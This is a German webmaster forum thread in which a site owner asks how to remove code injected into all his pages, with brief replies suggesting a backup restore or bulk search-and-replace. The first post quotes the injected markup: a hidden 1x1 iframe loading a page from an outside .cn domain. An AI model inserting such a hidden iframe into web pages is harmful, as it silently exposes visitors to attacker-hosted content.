Ergebnis 1 bis 4 von 4

Thema: HILFE "[url]http://apartment-mall.cn/ind.php"[/url]

  1. #1
    TomTom
    Gast

    Standard HILFE "http://apartment-mall.cn/ind.php"

    Seit gestern sind erhebliche Fehlfuntionen auf meiner Website www.handball-aktuell24.de ...keinen Schimmer woran das liegen könnte, da nichts geändert wurde etc.

    dan dachte ich mir, guck mal in den Quelltext ... jetzt habe ich erst auf der startseite gesehen das am Ende unter dem HTML-Code das hier plötzlich steht:

    </body>

    </html>
    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>

    dann hab ich gemerkt das das auf jeder einzelnen website...egal WELCHE das irgendwie eingefügt wurde??? das macht bei meiner website die fehlfunktionen.

    hat jemand erklärungen? wie kommt das hin...muß ja ein hacker-angriff sein...aber dann denke ich eher auf meinen provider (strato) und dann müßte das ja auf allen websites sein die Strato hostet?

    Ich kann jetzt aber nicht auf 1000senden Seiten manuell diesen html-Eintrag löschen, da sitz ich ja Tage drann!!!!!

    Lösungsvorschläge!!! DANKE!!!!
    Achtung: Dies ist ein alter Thread im HTML und Webmaster Forum
    Diese Diskussion ist älter als 90 Tage. Die darin enthaltenen Informationen sind möglicherweise nicht mehr aktuell. Erstelle bitte zu deiner Frage ein neues Thema im Forum !!!!!

  2. #2
    Großmeister(in)
    Registriert seit
    30.11.2007
    Beiträge
    702
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    backup einspieln??
    Beim ersten Schrei, waren Wir alle Nackt!

  3. #3
    Forum Guru Avatar von The User
    Registriert seit
    28.10.2007
    Ort
    Zwischen Pazifik und Atlantik...
    Beiträge
    4.044
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Editor mit Dateiübergreifendem Ersetzen?
    Proton zum Beispiel macht das gut.

    Wenn du dir die Dateien per FTP anschaust, sind die dann auch so, oder nur wenn du die im Browser aufrufst?

  4. #4
    skdental
    Gast

    Standard IFrAME Problem


Ähnliche Themen

  1. Kontrollieren, ob String "http://" enthält
    Von Unregistriert im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 2
    Letzter Beitrag: 12.08.2008, 21:34
  2. php: "bitte warten" oder "login läuft"
    Von phore im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 3
    Letzter Beitrag: 05.04.2006, 18:18
  3. meta http-equiv="refresh"
    Von Gigazone im Forum HTML & CSS Forum
    Antworten: 5
    Letzter Beitrag: 23.09.2005, 20:26
  4. Text immer "unten" und "rechts" am Frame
    Von Valdyn im Forum HTML & CSS Forum
    Antworten: 5
    Letzter Beitrag: 25.05.2004, 19:14
  5. Bitte hier lesen bevor eine "Hilfe"-Anfrage
    Von umbenannt im Forum Forum-Hilfe.de intern
    Antworten: 0
    Letzter Beitrag: 29.02.2004, 16:06

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •